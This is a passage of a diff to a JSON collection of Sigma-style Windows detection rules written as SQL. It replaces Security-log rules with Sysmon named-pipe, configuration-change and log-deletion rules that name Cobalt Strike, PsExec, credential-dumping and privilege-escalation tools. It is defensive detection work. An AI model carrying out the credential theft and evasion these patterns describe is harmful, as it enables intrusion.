((EventID = '4738' AND NOT ((SidHistory LIKE '-' ESCAPE '\\' OR SidHistory LIKE '\\%\\%1793' ESCAPE '\\'))) AND NOT (SidHistory = ''))))" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE 
'\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\'))" ], - "filename": "win_security_susp_add_sid_history.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "Suspicious Remote Logon with Explicit Credentials", - "id": "941e5c45-cda7-4864-8cea-bbb7458d194a", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", "status": "experimental", - "description": "Detects suspicious processes logging on with explicit credentials", - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1078", - "attack.lateral_movement" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Administrators that use the RunAS command or scheduled tasks" + "Rare legitimate use of psexec from the locations mentioned above" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4648' AND (ProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\winrs.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR ProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')) AND NOT ((TargetServerName = 'localhost') OR (SubjectUserName LIKE '%$' ESCAPE '\\' AND TargetUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * 
FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_susp_logon_explicit_credentials.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Account Tampering - Suspicious Failed Logon Reasons", - "id": "9eb99343-d336-4020-a3cd-67f3819e68ee", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", "status": "experimental", - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" - ], - "falsepositives": [ - "User using a disabled account" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4625', '4776') AND Status IN ('0xC0000072', '0xC000006F', '0xC0000070', '0xC0000413', '0xC000018C', '0xC000015B')) AND NOT (SubjectUserSid = 'S-1-0-0'))" - ], - "filename": "win_security_susp_failed_logon_reasons.yml" - }, - { - "title": "Windows Network Access Suspicious desktop.ini Action", - "id": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "status": "test", - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. 
renaming files) without changing them on disk.", - "author": "Tim Shelton (HAWK.IO)", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.009" + "attack.privilege_escalation" ], "falsepositives": [ - "Read only access list authority" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ObjectType = 'File' AND RelativeTargetName LIKE '%\\\\desktop.ini' ESCAPE '\\' AND (AccessList LIKE '%WriteData%' ESCAPE '\\' OR AccessList LIKE '%DELETE%' ESCAPE '\\' OR AccessList LIKE '%WriteDAC%' ESCAPE '\\' OR AccessList LIKE '%AppendData%' ESCAPE '\\' OR AccessList LIKE '%AddSubdirectory%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND PipeName LIKE '%thisispipe%' ESCAPE '\\')" ], - "filename": "win_security_net_share_obj_susp_desktop_ini.yml" + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE 
'\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "WMI Persistence - Security", - "id": 
"f033f3f3-fd24-4995-97d8-a3bb17550a88", + "title": "Alternate PowerShell Hosts Pipe", + "id": "58cb02d5-78ce-4692-b3e1-dce850aae41a", "status": "test", - "description": "Detects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.", - "author": "Florian Roth (Nextron Systems), Gleb Sukhodolskiy, Timur Zinniatullin oscd.community", + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.003" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Programs using PowerShell directly without invocation of a dedicated interpreter." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'WMI Namespace' AND ObjectName LIKE '%subscription%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND PipeName LIKE '\\\\PSHost%' ESCAPE '\\' AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR Image LIKE '%\\\\ForefrontActiveDirectoryConnector.exe' ESCAPE '\\' OR Image LIKE '%c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe' ESCAPE '\\')) OR (Image = '') OR (Image LIKE '%:\\\\Program Files%' ESCAPE '\\' AND Image LIKE '%\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\Tools\\\\Binn\\\\SQLPS.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\' OR Image LIKE 
'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\system32\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\'))))" ], - "filename": "win_security_wmi_persistence.yml" + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml" }, { - "title": "Remote Access Tool Services Have Been Installed - Security", - "id": "c8b00925-926c-47e3-beea-298fd563728e", - "status": "experimental", - "description": "Detects service installation of different remote access tools software. These software are often abused by threat actors to perform", - "author": "Connor Martin, Nasreddine Bencherchali (Nextron Systems)", + "title": "PsExec Pipes Artifacts", + "id": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "status": "test", + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1543.003", + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", "attack.t1569.002" ], "falsepositives": [ - "The rule doesn't look for anything suspicious so false positives are expected. 
If you use one of the tools mentioned, comment it out" + "Legitimate Administrator activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%SSUService%' ESCAPE '\\' OR ServiceFileName LIKE '%SplashtopRemoteService%' ESCAPE '\\' OR ServiceFileName LIKE '%Atera%' ESCAPE '\\' OR ServiceFileName LIKE '%LogMeIn%' ESCAPE '\\' OR ServiceFileName LIKE '%LMIGuardianSvc%' ESCAPE '\\' OR ServiceFileName LIKE '%TeamViewer%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCService%' ESCAPE '\\' OR ServiceFileName LIKE '%RPCPerformanceService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressStandaloneService%' ESCAPE '\\' OR ServiceFileName LIKE '%BASupportExpressSrvcUpdater%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToMyPC%' ESCAPE '\\' OR ServiceFileName LIKE '%monblanking%' ESCAPE '\\' OR ServiceFileName LIKE '%RManService%' ESCAPE '\\' OR ServiceFileName LIKE '%GoToAssist%' ESCAPE '\\' OR ServiceFileName LIKE '%AmmyyAdmin%' ESCAPE '\\' OR ServiceFileName LIKE '%vncserver%' ESCAPE '\\' OR ServiceFileName LIKE '%Parsec%' ESCAPE '\\' OR ServiceFileName LIKE '%chromoting%' ESCAPE '\\' OR ServiceFileName LIKE '%Zoho%' ESCAPE '\\' OR ServiceFileName LIKE '%jumpcloud%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE 'psexec%' ESCAPE '\\' OR PipeName LIKE 'paexec%' ESCAPE '\\' OR PipeName LIKE 'remcom%' ESCAPE '\\' OR PipeName LIKE 'csexec%' ESCAPE '\\'))" ], - "filename": "win_security_service_install_remote_access_software.yml" + "filename": "pipe_created_psexec_pipes_artifacts.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", - "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. 
Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\'))" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Suspicious Access to Sensitive File Extensions", - "id": "91c945bc-2ad1-4799-a591-4d00198a1215", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects known sensitive file extensions accessed on a network share", - "author": "Samir Bousseaden", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.collection", - "attack.t1039" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message 
files" + "Legitimate Administrator using tool for password recovery" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND (RelativeTargetName LIKE '%.pst' ESCAPE '\\' OR RelativeTargetName LIKE '%.ost' ESCAPE '\\' OR RelativeTargetName LIKE '%.msg' ESCAPE '\\' OR RelativeTargetName LIKE '%.nst' ESCAPE '\\' OR RelativeTargetName LIKE '%.oab' ESCAPE '\\' OR RelativeTargetName LIKE '%.edb' ESCAPE '\\' OR RelativeTargetName LIKE '%.nsf' ESCAPE '\\' OR RelativeTargetName LIKE '%.bak' ESCAPE '\\' OR RelativeTargetName LIKE '%.dmp' ESCAPE '\\' OR RelativeTargetName LIKE '%.kirbi' ESCAPE '\\' OR RelativeTargetName LIKE '%\\\\groups.xml' ESCAPE '\\' OR RelativeTargetName LIKE '%.rdp' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('17', '18') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\'))" ], - "filename": "win_security_susp_raccess_sensitive_fext.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", + "status": "experimental", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Highly unlikely" + "Legitimate administrative action" ], - "level": "critical", + 
"level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '255' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Secure Deletion with SDelete", - "id": "39a80702-d7ca-4a83-b776-525b1f86a36d", + "title": "Sysmon Configuration Change", + "id": "8ac03a65-6c84-4116-acad-dc1558ff7a77", "status": "test", - "description": "Detects renaming of file while deletion with SDelete tool.", - "author": "Thomas Patzke", + "description": "Detects a Sysmon configuration change, which could be the result 
of a legitimate reconfiguration or someone trying manipulate the configuration", + "author": "frack113", "tags": [ - "attack.impact", - "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate usage of SDelete" + "Legitimate administrative action" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663', '4658') AND (ObjectName LIKE '%.AAA' ESCAPE '\\' OR ObjectName LIKE '%.ZZZ' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID = '16')" ], - "filename": "win_security_susp_sdelete.yml" + "filename": "sysmon_config_modification.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", - "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. 
Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '27' AND Channel = 'Microsoft-Windows-Sysmon/Operational')" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055.012" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "There are no known false positives at this time" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT 
(ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((EventID = '25' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Type = 'Image is replaced' AND NOT ((Image LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR Image LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE ((EventID IN ('4', '16') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + 
"filename": "sysmon_config_modification_status.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", + "status": "experimental", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE ((EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Suspicious Kerberos RC4 Ticket Encryption", - "id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", + "title": "PowerShell Console History Logs Deleted", + "id": "ff301988-c231-4bd0-834c-ac9d73b86586", "status": "experimental", - "description": "Detects service ticket requests using RC4 encryption type", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the PowerShell console History logs 
which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4769' AND TicketOptions = '0x40810000' AND TicketEncryptionType = '0x17') AND NOT (ServiceName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('23', '26') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\PSReadLine\\\\ConsoleHost\\_history.txt' ESCAPE '\\')" ], - "filename": "win_security_susp_rc4_kerberos.yml" + "filename": "file_delete_win_delete_powershell_command_history.yml" }, { - "title": "Remote Task Creation via ATSVC Named Pipe", - "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", - "status": "test", - "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", - "author": "Samir Bousseaden", + "title": "IIS WebServer Access Logs Deleted", + "id": "3eb8c339-a765-48cc-a150-4364c04652bf", + "status": "experimental", + "description": "Detects the deletion of IIS WebServer access logs which may indicate an attempt to destroy forensic evidence", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.persistence", - "car.2013-05-004", - "car.2015-04-001", - "attack.t1053.002" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Unknown" + "During uninstallation of the IIS service", + "During log rotation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'atsvc' AND Accesses LIKE 
